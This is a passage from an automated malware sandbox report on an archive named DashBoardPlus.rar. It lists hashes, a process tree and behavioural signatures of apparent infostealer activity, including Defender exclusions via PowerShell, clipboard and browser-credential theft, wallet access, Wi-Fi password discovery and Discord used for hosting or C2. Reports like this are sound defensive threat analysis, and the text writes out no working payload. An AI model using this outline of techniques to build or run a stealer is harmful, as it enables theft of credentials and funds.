Analysis
-
max time kernel
255s -
max time network
260s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 18:49
Behavioral task
behavioral1
Sample
DashBoardPlus.rar
Resource
win10v2004-20240802-en
General
-
Target
DashBoardPlus.rar
-
Size
7.4MB
-
MD5
9b4ae9344080b377cde1b27d9b0e72a0
-
SHA1
a2b6d026bb39aa73ddc70a25d92e9a4260dd0b6c
-
SHA256
1d8ac1e72524b489e0da557f50b1eb6a925a308c7be505d9bb4456a1846ea561
-
SHA512
be9c0b21ef3e18d70f0a22cee38aa7f2280073bd88e3dbb5e4c31c55807a3e52a86e7d2de82f33bb60d9501abb9039def34afbd54f4be3a5cabe695238bacde6
-
SSDEEP
98304:+uJhb4SHUkErxyRCKMAWItbxMJMG/fIxyTiwjB2+LgcfwyBkFtDL94GqTs6s10cr:fJxrqOS7IXMVDvjJfwZPvhnuZeuNbppk
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4124 powershell.exe 5944 powershell.exe 5292 powershell.exe 4464 powershell.exe -
Downloads MZ/PE file
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 6120 cmd.exe 4584 powershell.exe -
Executes dropped EXE 8 IoCs
pid Process 5948 winrar-x64-701.exe 5792 RoAudio.exe 1600 RoAudio.exe 552 RoAudio.exe 2752 RoAudio.exe 4004 RoAudio.exe 5568 RoAudio.exe 5032 rar.exe -
Loads dropped DLL 47 IoCs
pid Process 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 1600 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 2752 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe 5568 RoAudio.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 98 discord.com 99 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 96 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 5004 tasklist.exe 4984 tasklist.exe 752 tasklist.exe -
resource yara_rule behavioral1/files/0x00070000000234cf-325.dat upx behavioral1/memory/1600-329-0x00007FFBFAC40000-0x00007FFBFB229000-memory.dmp upx behavioral1/files/0x00070000000234c2-331.dat upx behavioral1/memory/1600-333-0x00007FFC101A0000-0x00007FFC101C3000-memory.dmp upx behavioral1/files/0x00070000000234cd-334.dat upx behavioral1/memory/1600-336-0x00007FFC14D40000-0x00007FFC14D4F000-memory.dmp upx behavioral1/files/0x00070000000234cc-338.dat upx behavioral1/files/0x00070000000234ce-339.dat upx behavioral1/files/0x00070000000234c9-352.dat upx behavioral1/files/0x00070000000234c8-351.dat upx behavioral1/files/0x00070000000234c7-350.dat upx behavioral1/files/0x00070000000234c6-349.dat upx behavioral1/files/0x00070000000234c5-348.dat upx behavioral1/files/0x00070000000234c4-347.dat upx behavioral1/files/0x00070000000234c3-346.dat upx behavioral1/files/0x00080000000234bc-345.dat upx behavioral1/files/0x00070000000234d4-344.dat upx behavioral1/files/0x00070000000234d3-343.dat upx behavioral1/files/0x00070000000234d2-342.dat upx behavioral1/memory/1600-358-0x00007FFC0FFF0000-0x00007FFC1001D000-memory.dmp upx behavioral1/memory/1600-360-0x00007FFC10710000-0x00007FFC10729000-memory.dmp upx behavioral1/memory/1600-362-0x00007FFC0FFC0000-0x00007FFC0FFE3000-memory.dmp upx behavioral1/memory/1600-364-0x00007FFBFAAC0000-0x00007FFBFAC37000-memory.dmp upx behavioral1/memory/1600-366-0x00007FFC0FD40000-0x00007FFC0FD59000-memory.dmp upx behavioral1/memory/1600-368-0x00007FFC14B20000-0x00007FFC14B2D000-memory.dmp upx behavioral1/memory/1600-370-0x00007FFC01D30000-0x00007FFC01D63000-memory.dmp upx behavioral1/memory/1600-375-0x00007FFC00F10000-0x00007FFC00FDD000-memory.dmp upx behavioral1/memory/1600-377-0x00007FFBF9C50000-0x00007FFBFA170000-memory.dmp upx behavioral1/memory/1600-378-0x00007FFC101A0000-0x00007FFC101C3000-memory.dmp upx behavioral1/memory/1600-374-0x00007FFBFAC40000-0x00007FFBFB229000-memory.dmp upx behavioral1/memory/1600-383-0x00007FFC14500000-0x00007FFC1450D000-memory.dmp upx behavioral1/memory/1600-382-0x00007FFC0FFF0000-0x00007FFC1001D000-memory.dmp upx behavioral1/memory/1600-380-0x00007FFC0FD20000-0x00007FFC0FD34000-memory.dmp upx behavioral1/memory/1600-385-0x00007FFC00620000-0x00007FFC0073C000-memory.dmp upx behavioral1/memory/1600-408-0x00007FFC0FFC0000-0x00007FFC0FFE3000-memory.dmp upx behavioral1/memory/2752-409-0x00007FFBF8F40000-0x00007FFBF9529000-memory.dmp upx behavioral1/memory/1600-413-0x00007FFC0FD40000-0x00007FFC0FD59000-memory.dmp upx behavioral1/memory/2752-412-0x00007FFC10D10000-0x00007FFC10D1F000-memory.dmp upx behavioral1/memory/2752-411-0x00007FFC01530000-0x00007FFC01553000-memory.dmp upx behavioral1/memory/1600-410-0x00007FFBFAAC0000-0x00007FFBFAC37000-memory.dmp upx behavioral1/memory/2752-424-0x00007FFC00300000-0x00007FFC0032D000-memory.dmp upx behavioral1/memory/2752-435-0x00007FFBF4C50000-0x00007FFBF4DC7000-memory.dmp upx behavioral1/memory/1600-434-0x00007FFBF9C50000-0x00007FFBFA170000-memory.dmp upx behavioral1/memory/1600-432-0x00007FFC00F10000-0x00007FFC00FDD000-memory.dmp upx behavioral1/memory/2752-431-0x00007FFBFF310000-0x00007FFBFF333000-memory.dmp upx behavioral1/memory/2752-430-0x00007FFBFF670000-0x00007FFBFF689000-memory.dmp upx behavioral1/memory/1600-429-0x00007FFC01D30000-0x00007FFC01D63000-memory.dmp upx behavioral1/memory/1600-439-0x00007FFC14500000-0x00007FFC1450D000-memory.dmp upx behavioral1/memory/2752-441-0x00007FFBF84E0000-0x00007FFBF85AD000-memory.dmp upx behavioral1/memory/2752-501-0x00007FFBF4C50000-0x00007FFBF4DC7000-memory.dmp upx behavioral1/memory/2752-494-0x00007FFBF4730000-0x00007FFBF4C50000-memory.dmp upx behavioral1/memory/2752-498-0x00007FFBF84E0000-0x00007FFBF85AD000-memory.dmp upx behavioral1/memory/2752-497-0x00007FFC105A0000-0x00007FFC105AD000-memory.dmp upx behavioral1/memory/2752-496-0x00007FFBFA390000-0x00007FFBFA3A4000-memory.dmp upx behavioral1/memory/2752-493-0x00007FFBFA870000-0x00007FFBFA8A3000-memory.dmp upx behavioral1/memory/2752-492-0x00007FFC10870000-0x00007FFC1087D000-memory.dmp upx behavioral1/memory/2752-489-0x00007FFBFF310000-0x00007FFBFF333000-memory.dmp upx behavioral1/memory/2752-488-0x00007FFBFF670000-0x00007FFBFF689000-memory.dmp upx behavioral1/memory/2752-487-0x00007FFC00300000-0x00007FFC0032D000-memory.dmp upx behavioral1/memory/2752-486-0x00007FFC10D10000-0x00007FFC10D1F000-memory.dmp upx behavioral1/memory/2752-485-0x00007FFC01530000-0x00007FFC01553000-memory.dmp upx behavioral1/memory/2752-484-0x00007FFBF8F40000-0x00007FFBF9529000-memory.dmp upx behavioral1/memory/2752-495-0x00007FFBF8F40000-0x00007FFBF9529000-memory.dmp upx behavioral1/memory/2752-491-0x00007FFBFD810000-0x00007FFBFD829000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1368 cmd.exe 5160 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4552 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 928 systeminfo.exe -
Kills process with taskkill 10 IoCs
pid Process 3544 taskkill.exe 4004 taskkill.exe 2312 taskkill.exe 5964 taskkill.exe 2568 taskkill.exe 5856 taskkill.exe 2396 taskkill.exe 5336 taskkill.exe 6100 taskkill.exe 4584 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 794117.crdownload:SmartScreen msedge.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 1272 NOTEPAD.EXE 3048 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 2780 msedge.exe 2780 msedge.exe 2540 msedge.exe 2540 msedge.exe 2548 identity_helper.exe 2548 identity_helper.exe 5764 msedge.exe 5764 msedge.exe 4124 powershell.exe 4124 powershell.exe 1984 msedge.exe 1984 msedge.exe 1984 msedge.exe 1984 msedge.exe 4124 powershell.exe 4124 powershell.exe 4464 powershell.exe 4464 powershell.exe 4584 powershell.exe 4584 powershell.exe 4940 powershell.exe 4940 powershell.exe 4464 powershell.exe 4940 powershell.exe 4584 powershell.exe 5944 powershell.exe 5944 powershell.exe 5944 powershell.exe 2572 powershell.exe 2572 powershell.exe 2572 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4168 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 5148 7zG.exe Token: 35 5148 7zG.exe Token: SeSecurityPrivilege 5148 7zG.exe Token: SeSecurityPrivilege 5148 7zG.exe Token: SeRestorePrivilege 5716 7zG.exe Token: 35 5716 7zG.exe Token: SeSecurityPrivilege 5716 7zG.exe Token: SeSecurityPrivilege 5716 7zG.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 5004 tasklist.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4984 tasklist.exe Token: SeIncreaseQuotaPrivilege 4156 WMIC.exe Token: SeSecurityPrivilege 4156 WMIC.exe Token: SeTakeOwnershipPrivilege 4156 WMIC.exe Token: SeLoadDriverPrivilege 4156 WMIC.exe Token: SeSystemProfilePrivilege 4156 WMIC.exe Token: SeSystemtimePrivilege 4156 WMIC.exe Token: SeProfSingleProcessPrivilege 4156 WMIC.exe Token: SeIncBasePriorityPrivilege 4156 WMIC.exe Token: SeCreatePagefilePrivilege 4156 WMIC.exe Token: SeBackupPrivilege 4156 WMIC.exe Token: SeRestorePrivilege 4156 WMIC.exe Token: SeShutdownPrivilege 4156 WMIC.exe Token: SeDebugPrivilege 4156 WMIC.exe Token: SeSystemEnvironmentPrivilege 4156 WMIC.exe Token: SeRemoteShutdownPrivilege 4156 WMIC.exe Token: SeUndockPrivilege 4156 WMIC.exe Token: SeManageVolumePrivilege 4156 WMIC.exe Token: 33 4156 WMIC.exe Token: 34 4156 WMIC.exe Token: 35 4156 WMIC.exe Token: 36 4156 WMIC.exe Token: SeDebugPrivilege 752 tasklist.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeIncreaseQuotaPrivilege 4156 WMIC.exe Token: SeSecurityPrivilege 4156 WMIC.exe Token: SeTakeOwnershipPrivilege 4156 WMIC.exe Token: SeLoadDriverPrivilege 4156 WMIC.exe Token: SeSystemProfilePrivilege 4156 WMIC.exe Token: SeSystemtimePrivilege 4156 WMIC.exe Token: SeProfSingleProcessPrivilege 4156 WMIC.exe Token: SeIncBasePriorityPrivilege 4156 WMIC.exe Token: SeCreatePagefilePrivilege 4156 WMIC.exe Token: SeBackupPrivilege 4156 WMIC.exe Token: SeRestorePrivilege 4156 WMIC.exe Token: SeShutdownPrivilege 4156 WMIC.exe Token: SeDebugPrivilege 4156 WMIC.exe Token: SeSystemEnvironmentPrivilege 4156 WMIC.exe Token: SeRemoteShutdownPrivilege 4156 WMIC.exe Token: SeUndockPrivilege 4156 WMIC.exe Token: SeManageVolumePrivilege 4156 WMIC.exe Token: 33 4156 WMIC.exe Token: 34 4156 WMIC.exe Token: 35 4156 WMIC.exe Token: 36 4156 WMIC.exe Token: SeDebugPrivilege 5856 taskkill.exe Token: SeDebugPrivilege 3544 taskkill.exe Token: SeDebugPrivilege 4004 taskkill.exe Token: SeDebugPrivilege 2312 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 5964 taskkill.exe Token: SeDebugPrivilege 5336 taskkill.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 5148 7zG.exe 5716 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe 2540 msedge.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe 4168 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4168 wrote to memory of 1272 4168 OpenWith.exe 86 PID 4168 wrote to memory of 1272 4168 OpenWith.exe 86 PID 2540 wrote to memory of 5056 2540 msedge.exe 110 PID 2540 wrote to memory of 5056 2540 msedge.exe 110 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2564 2540 msedge.exe 111 PID 2540 wrote to memory of 2780 2540 msedge.exe 112 PID 2540 wrote to memory of 2780 2540 msedge.exe 112 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113 PID 2540 wrote to memory of 3492 2540 msedge.exe 113
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\DashBoardPlus.rar1⤵
- Modifies registry class
PID:1948
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\DashBoardPlus.rar2⤵
- Opens file in notepad (likely ransom note)
PID:1272
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1176
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\DashBoardPlus.rar1⤵
- Opens file in notepad (likely ransom note)
PID:3048
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbfec346f8,0x7ffbfec34708,0x7ffbfec347182⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:82⤵PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵PID:2608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:12⤵PID:4600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:12⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:12⤵PID:832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4232 /prefetch:12⤵PID:3192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:4012
-
-
